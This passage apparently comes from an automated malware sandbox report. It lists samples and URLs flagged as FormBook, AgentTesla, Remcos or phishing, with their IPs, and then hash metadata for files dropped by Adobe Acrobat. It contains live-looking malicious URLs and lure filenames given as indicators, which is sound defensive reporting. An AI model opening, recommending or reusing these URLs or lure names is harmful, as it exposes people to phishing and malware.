                                                                                                                                      CLOUDFLARENETUSrQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 172.67.195.27
                                                                                                                                      z22FATCS24_8566_Original.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                      • 104.21.45.139
                                                                                                                                      rSMKGKZ757385839500358358935775939058735Repoll.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                      • 172.67.191.112
                                                                                                                                      https://www.googleadservices.com/pagead/aclk?sa=L&ai=CEPSIY7k7Zpu1AY3rkPIP8q21mAvP_pi8d4PY85XiEsq6jPG-ARABIPT5xiVgyeaGi7ykoBqgAcCz_YIDyAEC4AIAqAMByAMIqgSdAk_QZfhjp8EKKRw8Ud-sac3T3jbhfjxjJ1sRhgU3SOjAuI5huqeTvemsIazylmO5A9WU45_edGutcUqL46MvuNtxU89a64S7xhljcSlyUs-dysnWLJ2j0jUpH_gKnco9owTuaX1dg-lH7IYSpQI3MKj-Dr00v1SC_8ZhuzoINVR1E2pcblzJpyD5_udwujRkOY3Fao0Lt8Mai9Sq-EbJfdXMijbwOeNV94FwcwlSMZ7he13IkHy_a1HexFAPvo5qqjQXKG7VuYCajYpF3q5URq0loIuDY5WXWNc5RPV77yzvPDM2ytOukuK76vBmfoFdcFIyWUc5xZIVsm9dr8SzjJNE1z63RwDOkXHpq4VxrPcl1gRfUlqaUGyYeMbOoMAEp9WvltcE4AQBiAWQgcDhTpAGAaAGAoAHqMyCfYgHAZAHAqgH2baxAqgH1ckbqAemvhuoB47OG6gHk9gbqAfulrECqAf-nrECqAevvrECqAeaBqgH89EbqAeW2BuoB6qbsQKoB4OtsQKoB-C9sQKoB_-esQKoB9-fsQKoB_jCsQKoB_vCsQLYBwHSCCcIABACGB0yAQA6Dp_QgICAgASAwICAgKAoSL39wTpYjsuajM3-hQOxCUbAF_v0mAHVgAoDmAsByAsBqg0CVVPIDQHiDRMIlf2ajM3-hQMVjTVECB3yVg2z2BMM0BUB-BYBgBcBshgJEgLeaBgCIgEA6BgB&ae=1&gclid=Cj0KCQjwxeyxBhC7ARIsAC7dS38YLg3rX_OKomm_dfFxFHKQ-xaABBJ-7gCz8VhxHk9qVjyKpQQOlOIaAvqNEALw_wcB&num=1&cid=CAQSQwB7FLtqgUEuOym-5Tn68arUiPJ1jdwPgw46Y6zUHfAkI3hTIEhGQzVeYafsm9LBj6pxutwTRiLFJPhCq9OvYdD7CqQYAQ&sig=AOD64_2G4fRbd2sH1E5jnf1iXQS4SW_Q2g&client=ca-pub-6396844742497208&rf=5&nx=CLICK_X&ny=CLICK_Y&uap=UACH(platform)&uapv=UACH(platformVersion)&uaa=UACH(architecture)&uam=UACH(model)&uafv=UACH(uaFullVersion)&uab=UACH(bitness)&uaw=UACH(wow64)&uafvl=UACH(fullVersionList)&nb=2&adurl=https://browsingwithwave.com/%3Fsrc%3Dd-aff16-cp21142438032%26ob%3Dobgcobedobem%26dvc%3Dc%26k%3D%26crt%3D695418066867%26adp%3D%26plc%3D%26tgt%3D%26sl%3D%26cpd%3D21142438032%26iid%3Dwav%26gclid%3DCj0KCQjwxeyxBhC7ARIsAC7dS38YLg3rX_OKomm_dfFxFHKQ-xaABBJ-7gCz8VhxHk9qVjyKpQQOlOIaAvqNEALw_wcBGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.67.40.50
                                                                                                                                      https://app.degoo.com/share/0qvXztVGLoa7G-ff4OcNewGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.109.63
                                                                                                                                      https://t.co/yKnQGIBNmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 172.67.190.76
                                                                                                                                      PO#AL231108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                      • 172.67.74.152
                                                                                                                                      https://tools.darvin.de/info?url_short=LindahumphGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.21.44.91
                                                                                                                                      https://tools.darvin.de/info?url_short=LindahumphGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.17.2.184
                                                                                                                                      https://flow.page/dramsdocsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.18.125.91
                                                                                                                                      ADVANTAGECOMUSp29D3FgSJF3zkbt.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 66.29.135.159
                                                                                                                                      Receipt207413.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                      • 66.29.151.236
                                                                                                                                      Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 66.29.149.46
                                                                                                                                      INQUIRY RE44535_pdf.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                      • 66.29.159.53
                                                                                                                                      Order List.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                      • 66.29.137.43
                                                                                                                                      z8s945rPmZ.exeGet hashmaliciousSystemBCBrowse
                                                                                                                                      • 66.29.153.209
                                                                                                                                      A7aMlqL4J8HRCLk.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 66.29.135.159
                                                                                                                                      file.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                                                                                                      • 66.29.135.159
                                                                                                                                      OSL332C-HBLx#U180es#U180el#U180ex#U180e..exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 66.29.135.159
                                                                                                                                      IMG_77020316.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                      • 66.29.151.236
                                                                                                                                      CLOUDFLARENETUSrQuotationRequestandProductAvailabilityForm.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 172.67.195.27
                                                                                                                                      z22FATCS24_8566_Original.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                      • 104.21.45.139
                                                                                                                                      rSMKGKZ757385839500358358935775939058735Repoll.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                      • 172.67.191.112
                                                                                                                                      https://www.googleadservices.com/pagead/aclk?sa=L&ai=CEPSIY7k7Zpu1AY3rkPIP8q21mAvP_pi8d4PY85XiEsq6jPG-ARABIPT5xiVgyeaGi7ykoBqgAcCz_YIDyAEC4AIAqAMByAMIqgSdAk_QZfhjp8EKKRw8Ud-sac3T3jbhfjxjJ1sRhgU3SOjAuI5huqeTvemsIazylmO5A9WU45_edGutcUqL46MvuNtxU89a64S7xhljcSlyUs-dysnWLJ2j0jUpH_gKnco9owTuaX1dg-lH7IYSpQI3MKj-Dr00v1SC_8ZhuzoINVR1E2pcblzJpyD5_udwujRkOY3Fao0Lt8Mai9Sq-EbJfdXMijbwOeNV94FwcwlSMZ7he13IkHy_a1HexFAPvo5qqjQXKG7VuYCajYpF3q5URq0loIuDY5WXWNc5RPV77yzvPDM2ytOukuK76vBmfoFdcFIyWUc5xZIVsm9dr8SzjJNE1z63RwDOkXHpq4VxrPcl1gRfUlqaUGyYeMbOoMAEp9WvltcE4AQBiAWQgcDhTpAGAaAGAoAHqMyCfYgHAZAHAqgH2baxAqgH1ckbqAemvhuoB47OG6gHk9gbqAfulrECqAf-nrECqAevvrECqAeaBqgH89EbqAeW2BuoB6qbsQKoB4OtsQKoB-C9sQKoB_-esQKoB9-fsQKoB_jCsQKoB_vCsQLYBwHSCCcIABACGB0yAQA6Dp_QgICAgASAwICAgKAoSL39wTpYjsuajM3-hQOxCUbAF_v0mAHVgAoDmAsByAsBqg0CVVPIDQHiDRMIlf2ajM3-hQMVjTVECB3yVg2z2BMM0BUB-BYBgBcBshgJEgLeaBgCIgEA6BgB&ae=1&gclid=Cj0KCQjwxeyxBhC7ARIsAC7dS38YLg3rX_OKomm_dfFxFHKQ-xaABBJ-7gCz8VhxHk9qVjyKpQQOlOIaAvqNEALw_wcB&num=1&cid=CAQSQwB7FLtqgUEuOym-5Tn68arUiPJ1jdwPgw46Y6zUHfAkI3hTIEhGQzVeYafsm9LBj6pxutwTRiLFJPhCq9OvYdD7CqQYAQ&sig=AOD64_2G4fRbd2sH1E5jnf1iXQS4SW_Q2g&client=ca-pub-6396844742497208&rf=5&nx=CLICK_X&ny=CLICK_Y&uap=UACH(platform)&uapv=UACH(platformVersion)&uaa=UACH(architecture)&uam=UACH(model)&uafv=UACH(uaFullVersion)&uab=UACH(bitness)&uaw=UACH(wow64)&uafvl=UACH(fullVersionList)&nb=2&adurl=https://browsingwithwave.com/%3Fsrc%3Dd-aff16-cp21142438032%26ob%3Dobgcobedobem%26dvc%3Dc%26k%3D%26crt%3D695418066867%26adp%3D%26plc%3D%26tgt%3D%26sl%3D%26cpd%3D21142438032%26iid%3Dwav%26gclid%3DCj0KCQjwxeyxBhC7ARIsAC7dS38YLg3rX_OKomm_dfFxFHKQ-xaABBJ-7gCz8VhxHk9qVjyKpQQOlOIaAvqNEALw_wcBGet hashmaliciousUnknownBrowse
                                                                                                                                      • 172.67.40.50
                                                                                                                                      https://app.degoo.com/share/0qvXztVGLoa7G-ff4OcNewGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.109.63
                                                                                                                                      https://t.co/yKnQGIBNmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 172.67.190.76
                                                                                                                                      PO#AL231108.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                                                                                                                      • 172.67.74.152
                                                                                                                                      https://tools.darvin.de/info?url_short=LindahumphGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.21.44.91
                                                                                                                                      https://tools.darvin.de/info?url_short=LindahumphGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.17.2.184
                                                                                                                                      https://flow.page/dramsdocsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.18.125.91
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      28a2c9bd18a11de089ef85a160da29e4https://app.degoo.com/share/0qvXztVGLoa7G-ff4OcNewGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://t.co/yKnQGIBNmnGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://tools.darvin.de/info?url_short=LindahumphGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://tools.darvin.de/info?url_short=LindahumphGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://flow.page/dramsdocsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://chs.caGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://vk.com/away.php?to=https://sigtn.com////////utils/emt.cfm?client_id=9195153%26campaign_id=73466%26link=neoparts.com.br/dayo/ovu5/ZGVlbWEuYW1tYXJAYmVpbi5jb20=$Get hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://flow.page/sedicadocsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://flow.page/dolphdocsGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      https://flow.page/clipasdfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.125.88.106
                                                                                                                                      • 40.127.169.103
                                                                                                                                      • 20.114.59.183
                                                                                                                                      No context
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):290
                                                                                                                                      Entropy (8bit):5.133235939486752
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DvH3q2PRN2nKuAl9OmbnIFUt86vHaZmw+6vHmkwORN2nKuAl9OmbjLJ:D/vaHAahFUt86y/+6+5JHAaSJ
                                                                                                                                      MD5:58EB30AB37A9ED708D16396E9FCFD27B
                                                                                                                                      SHA1:9A954014100D702633CED9B32873E46EF7BD4B34
                                                                                                                                      SHA-256:054069BDB854B7B4D52309CF29AB20E25897A91752E3274DD847159EED063189
                                                                                                                                      SHA-512:2DDC6D4AD8A2BEE227905BED3FFC379FFD8648BD4765CF250A1432C3FCCA37942E85A2C89D0A6972687E5DF0E63C0B1E04CAD8524B5164DD841FE3A70C20FE83
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:2024/05/08-20:11:57.030 1720 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/08-20:11:57.030 1720 Recovering log #3.2024/05/08-20:11:57.030 1720 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):290
                                                                                                                                      Entropy (8bit):5.133235939486752
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DvH3q2PRN2nKuAl9OmbnIFUt86vHaZmw+6vHmkwORN2nKuAl9OmbjLJ:D/vaHAahFUt86y/+6+5JHAaSJ
                                                                                                                                      MD5:58EB30AB37A9ED708D16396E9FCFD27B
                                                                                                                                      SHA1:9A954014100D702633CED9B32873E46EF7BD4B34
                                                                                                                                      SHA-256:054069BDB854B7B4D52309CF29AB20E25897A91752E3274DD847159EED063189
                                                                                                                                      SHA-512:2DDC6D4AD8A2BEE227905BED3FFC379FFD8648BD4765CF250A1432C3FCCA37942E85A2C89D0A6972687E5DF0E63C0B1E04CAD8524B5164DD841FE3A70C20FE83
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:2024/05/08-20:11:57.030 1720 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/05/08-20:11:57.030 1720 Recovering log #3.2024/05/08-20:11:57.030 1720 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):334
                                                                                                                                      Entropy (8bit):5.171308756879251
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DvtJgt+q2PRN2nKuAl9Ombzo2jMGIFUt86vtFYFZZmw+6vtFYFNVkwORN2nKuAlx:DPgovaHAa8uFUt86DYX/+6DYF5JHAa8z
                                                                                                                                      MD5:24DE511F158DB8F72D54CEE796E29FFF
                                                                                                                                      SHA1:F1EDC51A644D08F08B12203D1A7E3BB02411A143
                                                                                                                                      SHA-256:50788DD34D3EA86F193187738D256EF0EA43AC6B7E96A48F5C79466CC64293FC
                                                                                                                                      SHA-512:E567B7C77F59DFF12E5B79869D680D9B41B77F682031A86EC43D22C9D81CAD59E863B3D8D4DAD9008A7003E4048AA1A6D5FEA038723035AA9E175F8ACC89D19E
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:2024/05/08-20:11:56.915 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/08-20:11:56.919 1a18 Recovering log #3.2024/05/08-20:11:56.919 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):334
                                                                                                                                      Entropy (8bit):5.171308756879251
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DvtJgt+q2PRN2nKuAl9Ombzo2jMGIFUt86vtFYFZZmw+6vtFYFNVkwORN2nKuAlx:DPgovaHAa8uFUt86DYX/+6DYF5JHAa8z
                                                                                                                                      MD5:24DE511F158DB8F72D54CEE796E29FFF
                                                                                                                                      SHA1:F1EDC51A644D08F08B12203D1A7E3BB02411A143
                                                                                                                                      SHA-256:50788DD34D3EA86F193187738D256EF0EA43AC6B7E96A48F5C79466CC64293FC
                                                                                                                                      SHA-512:E567B7C77F59DFF12E5B79869D680D9B41B77F682031A86EC43D22C9D81CAD59E863B3D8D4DAD9008A7003E4048AA1A6D5FEA038723035AA9E175F8ACC89D19E
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:2024/05/08-20:11:56.915 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/05/08-20:11:56.919 1a18 Recovering log #3.2024/05/08-20:11:56.919 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):403
                                                                                                                                      Entropy (8bit):4.953858338552356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                      MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                      SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                      SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                      SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):403
                                                                                                                                      Entropy (8bit):4.953858338552356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                      MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                      SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                      SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                      SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:moderate, very likely benign file
                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):403
                                                                                                                                      Entropy (8bit):4.953858338552356
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YHO8sq/WLksBdOg2H9caq3QYiubrP7E4T3y:YXsRJdMHM3QYhbz7nby
                                                                                                                                      MD5:4C313FE514B5F4E7E89329630909F8DC
                                                                                                                                      SHA1:916EED77EC8C9DC90C64FF1E5CC9D04D4674EE56
                                                                                                                                      SHA-256:1EE7C151EF264F91FCDCCB6644F62DC33E27A4E829DAAB748DA1DE4426400873
                                                                                                                                      SHA-512:1726CAFCBA0121691DFA87A7298E6610BC4C7FD900867FD1B1710811E764918585E56788E08B7CA2CEE001F5DFD110E1BE6F6BBD7C2A7B7E2FC87D3DED210205
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341145152835463","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144284},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:JSON data
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):403
                                                                                                                                      Entropy (8bit):4.987646714804806
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:YHO8sqZc1sBdOg2HLcaq3QYiubrP7E4T3y:YXscdMHy3QYhbz7nby
                                                                                                                                      MD5:623613CD7D5141C6B02C2A95287B8B98
                                                                                                                                      SHA1:E8C018D244FBE316A551CC080279ED17E318E6C7
                                                                                                                                      SHA-256:21EA332781CFA4A6B437775997BFF709271F6831C3D2FC8E62933E26DD851B93
                                                                                                                                      SHA-512:870685CBB0E151D87FB4DBDEC371DB641FB6B161A741DA9F8EB4431ACACB50E996ECB725EEA1814D2CA86A7B659A3FC47C1CF9DE5ABE63102DED4F6AB184733E
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13359751945185660","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":165052},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.16","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):4099
                                                                                                                                      Entropy (8bit):5.2271000389333775
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:OLSw0bSwIAnrRqLX2rSq1OUxu/0OZ0xRBTxekN8xebGLD:OLT0bTIeYa51Ogu/0OZARBT8kN88bGLD
                                                                                                                                      MD5:5FA977BE8FA2D51CF1A465AC4F8C4011
                                                                                                                                      SHA1:9E916AC36B45C1C8F581DBAC44889BF51D0F2409
                                                                                                                                      SHA-256:51E7B4766335BEE291985C3DCCD86E514FE5FC381752D687EFF4B7F9BFB96844
                                                                                                                                      SHA-512:485B58902AD4A3B79D9E407F1D9A9304C7DC0C620C39EBEA3EB0E16CDDBA82210BD35D6BCF22B08F22AF4BD3075F26A3FE3ED2F036F2409F3D26B0148770B2F5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:*...#................version.1..namespace-e...o................next-map-id.1.Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/.0y.S_r................next-map-id.2.Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/.16.X:r................next-map-id.3.Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/.2.P.@o................next-map-id.4.Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/.346.+^...............Pnamespace-1d95df23_a38f_44a8_b732_4e62dd896a16-https://rna-resource.acrobat.com/....^...............Pnamespace-09c119c2_97bc_4467_8f67_f92472c9e5dc-https://rna-resource.acrobat.com/..?&a...............Snamespace-2a884c18_b39c_4e3d_942f_252e530ca4bd-https://rna-v2-resource.acrobat.com/_...a...............Snamespace-2e78bfda_7188_4688_a4aa_1ff81b6e5eaa-https://rna-v2-resource.acrobat.com/...o................next-map-id.5.Pnamespace-07af9ee9_2076_4f12_94b5_
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):322
                                                                                                                                      Entropy (8bit):5.149957933755886
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DvHUG+q2PRN2nKuAl9OmbzNMxIFUt86vH6W5Zmw+6vHIONVkwORN2nKuAl9OmbzE:DkvaHAa8jFUt86iW5/+6Hz5JHAa84J
                                                                                                                                      MD5:1FFCDB47BD567FD1DE8500E7EE8BF62C
                                                                                                                                      SHA1:D92BF190F12C62BF8FDE4876047A83E81C0E620C
                                                                                                                                      SHA-256:654C9243DEFA3F92DC3C6A2FDB98BF5521DBFC6DBBBE7BDB4BD6D11D6DFCF80E
                                                                                                                                      SHA-512:DB728D179A6D4039E1B836474CE47E1B891346125A2840BAD9E0930262EE866C00F674374BF70574EDE5F55E3982BF8E78FBB4A50BB698F1278FD577D507019B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/05/08-20:11:57.070 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/08-20:11:57.072 1a18 Recovering log #3.2024/05/08-20:11:57.074 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                                                      File Type:ASCII text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):322
                                                                                                                                      Entropy (8bit):5.149957933755886
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:DvHUG+q2PRN2nKuAl9OmbzNMxIFUt86vH6W5Zmw+6vHIONVkwORN2nKuAl9OmbzE:DkvaHAa8jFUt86iW5/+6Hz5JHAa84J
                                                                                                                                      MD5:1FFCDB47BD567FD1DE8500E7EE8BF62C
                                                                                                                                      SHA1:D92BF190F12C62BF8FDE4876047A83E81C0E620C
                                                                                                                                      SHA-256:654C9243DEFA3F92DC3C6A2FDB98BF5521DBFC6DBBBE7BDB4BD6D11D6DFCF80E
                                                                                                                                      SHA-512:DB728D179A6D4039E1B836474CE47E1B891346125A2840BAD9E0930262EE866C00F674374BF70574EDE5F55E3982BF8E78FBB4A50BB698F1278FD577D507019B
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:2024/05/08-20:11:57.070 1a18 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/05/08-20:11:57.072 1a18 Recovering log #3.2024/05/08-20:11:57.074 1a18 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                                      File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):71190
                                                                                                                                      Entropy (8bit):0.9348425214462788
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:mO7gxgAQOiCBMZMMMgMMMk4sMMbmMf0d0T:JExgA3d0T
                                                                                                                                      MD5:73A424826764B7D390D22C3B5452726A
                                                                                                                                      SHA1:1F28C5417BB5CE16EA32FE3748C620DC1F971B63
                                                                                                                                      SHA-256:B26F03AD5FAF0646732D8688C746EA324CCB50F4538B2378AB4B2952E85AFE6C
                                                                                                                                      SHA-512:B5C2F90C2C7EDA1D7C7729E78F65786DD198A6380108F1540A3259BD1377BCEAF132D297CFDF83BC497C975604A331D35027A586666DE17B9245479D3583635C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
